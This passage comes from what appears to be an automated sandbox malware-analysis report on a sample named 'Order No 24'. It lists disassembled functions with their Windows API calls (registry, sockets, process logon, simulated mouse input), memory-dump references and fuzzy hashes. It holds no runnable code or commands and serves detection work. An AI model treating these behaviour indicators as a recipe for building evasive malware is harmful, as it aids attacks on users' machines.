                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1380811348-0
                                                                                                                                  • Opcode ID: 7bd9d1400dedf237594bd0390b0b8ceb4c5c51728b501939481b50df8db85da7
                                                                                                                                  • Instruction ID: 61e4628414fef761a4c7e737a2ad7834bfedcb1fc59b233c5e67ab3d39ce59d2
                                                                                                                                  • Opcode Fuzzy Hash: 7bd9d1400dedf237594bd0390b0b8ceb4c5c51728b501939481b50df8db85da7
                                                                                                                                  • Instruction Fuzzy Hash: 30513BB25043449FD721EF64C885FABB7ECAF88754F00491EF58696291EB70A905CBA2
                                                                                                                                  Function 009E2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E30AF
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E30EF
                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009E3112
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009E313B
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009E317E
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009E318B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3451389628-0
                                                                                                                                  • Opcode ID: e5bef604bc4e233cfad05dd8e6b198b57c34eb6c659b1528e2bd4e8bc61e667a
                                                                                                                                  • Instruction ID: 61443ea71a3ad0b903f8f64875b828be4b9f67dcc14a841172bb729e6e3f3e3a
                                                                                                                                  • Opcode Fuzzy Hash: e5bef604bc4e233cfad05dd8e6b198b57c34eb6c659b1528e2bd4e8bc61e667a
                                                                                                                                  • Instruction Fuzzy Hash: 12516872608344AFC705EF65C895E6ABBE9FF88304F04891DF556872A1DB31EA05CB52
                                                                                                                                  Function 009E84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetMenu.USER32(?), ref: 009E8540
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 009E8577
                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009E859F
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 009E860E
                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 009E861C
                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 009E866D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 650687236-0
                                                                                                                                  • Opcode ID: 8a5f3fab764d49d1e06afd9bb62e4751f63c3e063288a780c2ed81a4d35fa834
                                                                                                                                  • Instruction ID: 0abe8db058dc3f7b1a948fc969f760f68ddfb33a225f2c78875f44994407978f
                                                                                                                                  • Opcode Fuzzy Hash: 8a5f3fab764d49d1e06afd9bb62e4751f63c3e063288a780c2ed81a4d35fa834
                                                                                                                                  • Instruction Fuzzy Hash: 79518D71A00219AFCF12EF95C945AAEB7F4FF88710F104499E91ABB351DF30AE418B91
                                                                                                                                  Function 009C4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C4B10
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4B5B
                                                                                                                                  • IsMenu.USER32(00000000), ref: 009C4B7B
                                                                                                                                  • CreatePopupMenu.USER32 ref: 009C4BAF
                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 009C4C0D
                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009C4C3E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                  • Opcode ID: 847d6b7f9f409a694ec21c6d4ec2ec11e45403eb2f1ce318875ec28991f43d2a
                                                                                                                                  • Instruction ID: 05c2b6f1a5b1448c8f151f11cc48d50b9106bb51ae4758cf84c9c2e67d2a73b4
                                                                                                                                  • Opcode Fuzzy Hash: 847d6b7f9f409a694ec21c6d4ec2ec11e45403eb2f1ce318875ec28991f43d2a
                                                                                                                                  • Instruction Fuzzy Hash: 02519B70F01209EBDF20CFA8D898FEDBBF8AF45318F14415DE8959A2A1D3719945CB52
                                                                                                                                  Function 009D8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00A1DC00), ref: 009D8E7C
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8E89
                                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 009D8EAD
                                                                                                                                  • #16.WSOCK32(?,?,00000000,00000000), ref: 009D8EC5
                                                                                                                                  • _strlen.LIBCMT ref: 009D8EF7
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8F6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_strlenselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2217125717-0
                                                                                                                                  • Opcode ID: eead00025f16e87527b43d5dc7aa3345eb189cb1361a5f8600550e11bb466384
                                                                                                                                  • Instruction ID: ca21a60831975bf5313ca849c2084f2b2b334e1522d976edfe85ba491a1d6259
                                                                                                                                  • Opcode Fuzzy Hash: eead00025f16e87527b43d5dc7aa3345eb189cb1361a5f8600550e11bb466384
                                                                                                                                  • Instruction Fuzzy Hash: 96417371500104ABCB14EBA8CD95FAEB7BDAF98314F10855AF516973D2DF34AE40CB60
                                                                                                                                  Function 0099ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 0099AC2A
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0099AC8E
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0099ACAB
                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0099ACBC
                                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 0099AD06
                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009FE673
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2592858361-0
                                                                                                                                  • Opcode ID: fba75e83aca8dabda95d414ea9e77c3b5314e8e5c8a788febee6be01803d1de6
                                                                                                                                  • Instruction ID: 0886309d1186d4775d75128a2e825c86dc7fdc367c65b1977dd65da5a6b06a30
                                                                                                                                  • Opcode Fuzzy Hash: fba75e83aca8dabda95d414ea9e77c3b5314e8e5c8a788febee6be01803d1de6
                                                                                                                                  • Instruction Fuzzy Hash: 4D41B6751043049FCB11DF58DC84F767BE8EB99320F140669FA94872A1D7359C86DBA2
                                                                                                                                  Function 009EE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00A41628,00000000,00A41628,00000000,00000000,00A41628,?,009FDC5D,00000000,?,00000000,00000000,00000000,?,009FDAD1,00000004), ref: 009EE40B
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 009EE42F
                                                                                                                                  • ShowWindow.USER32(00A41628,00000000), ref: 009EE48F
                                                                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 009EE4A1
                                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 009EE4C5
                                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009EE4E8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                  • Opcode ID: 40d6f92d899a93c496a1d1a5db9f7d9344110e2254964dd231f86c2757dd8e81
                                                                                                                                  • Instruction ID: 0a40cb1a447b16a64ab2d2910818d05c69cca61b99a557c17aab19906d598902
                                                                                                                                  • Opcode Fuzzy Hash: 40d6f92d899a93c496a1d1a5db9f7d9344110e2254964dd231f86c2757dd8e81
                                                                                                                                  • Instruction Fuzzy Hash: F2415B31601584EFEB23CF69C499B947BE5BF09304F1881A9EA588F2F2D731AC42CB51
                                                                                                                                  Function 009C98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 009C98D1
                                                                                                                                    • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                                                                                                                    • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009C9908
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 009C9924
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 009C999E
                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009C99B3
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 009C99D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2537439066-0
                                                                                                                                  • Opcode ID: 51eea5b14fc96cc9eb591007ffe4f94a21d796451e6f27f4efc58fc5d8076bd8
                                                                                                                                  • Instruction ID: be623eac38007b64a66ecca8166888bc8fae424c3785fb8de3b1484160dd1f93
                                                                                                                                  • Opcode Fuzzy Hash: 51eea5b14fc96cc9eb591007ffe4f94a21d796451e6f27f4efc58fc5d8076bd8
                                                                                                                                  • Instruction Fuzzy Hash: C4315232A00105EBDF10DF99DC89EAAB778FF84310B148069F905EB256D770DE11DBA1
                                                                                                                                  Function 009D9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,009D77F4,?,?,00000000,00000001), ref: 009D9B53
                                                                                                                                    • Part of subcall function 009D6544: GetWindowRect.USER32(?,?), ref: 009D6557
                                                                                                                                  • GetDesktopWindow.USER32 ref: 009D9B7D
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 009D9B84
                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009D9BB6
                                                                                                                                    • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009D9BE2
                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009D9C44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4137160315-0
                                                                                                                                  • Opcode ID: 5e10e339937f35bc9a366f441c6ce39a127b3a2614fc8e120a7b6cde4f8f0155
                                                                                                                                  • Instruction ID: 159e8e4f0c521be7221f9a4fe51d806e738fb9e800fd7044d20199d124268ded
                                                                                                                                  • Opcode Fuzzy Hash: 5e10e339937f35bc9a366f441c6ce39a127b3a2614fc8e120a7b6cde4f8f0155
                                                                                                                                  • Instruction Fuzzy Hash: 2231BE72544309ABD710DFA89C49F9AB7EDFF88314F00091AF585A7281D671E909CB92
                                                                                                                                  Function 009BAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009BAFAE
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 009BAFB5
                                                                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009BAFC4
                                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 009BAFCF
                                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009BAFFE
                                                                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 009BB012
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1413079979-0
                                                                                                                                  • Opcode ID: 9c2adadf36fff9b525ec85eaac640d710fbe47d08e26bf7032ca87ac64ac1f9b
                                                                                                                                  • Instruction ID: 4666ea247d000c790ea7a911ab5e13c9047b7df0867277ec70b734c502bf71bf
                                                                                                                                  • Opcode Fuzzy Hash: 9c2adadf36fff9b525ec85eaac640d710fbe47d08e26bf7032ca87ac64ac1f9b
                                                                                                                                  • Instruction Fuzzy Hash: 9E2149B210420DABDB02DFE4DE09BEE7BA9AB44324F044015FA01A6161C376DD22EB61
                                                                                                                                  Function 009EEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                                                                                                                    • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                                                                                                                    • Part of subcall function 0099AF83: BeginPath.GDI32(?), ref: 0099B009
                                                                                                                                    • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099B033
                                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 009EEC20
                                                                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 009EEC34
                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EEC42
                                                                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 009EEC52
                                                                                                                                  • EndPath.GDI32(00000000), ref: 009EEC62
                                                                                                                                  • StrokePath.GDI32(00000000), ref: 009EEC72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                  • Opcode ID: 023de4020d2552c22181356a16e9cfb5840b33f31c7feaad1a6eace75858176f
                                                                                                                                  • Instruction ID: 767d1ff1c6a222d5558e330057733e9547b96f15b0bddb0e3ab84dbd02fb30d2
                                                                                                                                  • Opcode Fuzzy Hash: 023de4020d2552c22181356a16e9cfb5840b33f31c7feaad1a6eace75858176f
                                                                                                                                  • Instruction Fuzzy Hash: 0011F77600014DBFEB02DFD4DD88EEA7F6DEB08354F048112BE0989160D7719D569BA0
                                                                                                                                  Function 009BE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 009BE1C0
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 009BE1D1
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009BE1D8
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 009BE1E0
                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009BE1F7
                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 009BE209
                                                                                                                                    • Part of subcall function 009B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,009B9A05,00000000,00000000,?,009B9DDB), ref: 009BA53A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 603618608-0
                                                                                                                                  • Opcode ID: acefa3d6fda0d003cd312fdad50e666cb1e1b0ecffcb8ec63057fe838a3e9d4b
                                                                                                                                  • Instruction ID: 3e70b19ad5083e6d0b8effd63eea69c7f6348c3dd7838c722914d00f980c4a07
                                                                                                                                  • Opcode Fuzzy Hash: acefa3d6fda0d003cd312fdad50e666cb1e1b0ecffcb8ec63057fe838a3e9d4b
                                                                                                                                  • Instruction Fuzzy Hash: 410184B5A00218BFEB109FE58C45B9EBFB8EB48351F004066EA04A7290D6719C02CBA0
                                                                                                                                  Function 009A7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __init_pointers.LIBCMT ref: 009A7B47
                                                                                                                                    • Part of subcall function 009A123A: __initp_misc_winsig.LIBCMT ref: 009A125E
                                                                                                                                    • Part of subcall function 009A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009A7F51
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A7F65
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A7F78
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A7F8B
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A7F9E
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A7FB1
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A7FC4
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A7FD7
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A7FEA
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A7FFD
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A8010
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A8023
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A8036
                                                                                                                                    • Part of subcall function 009A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A8049
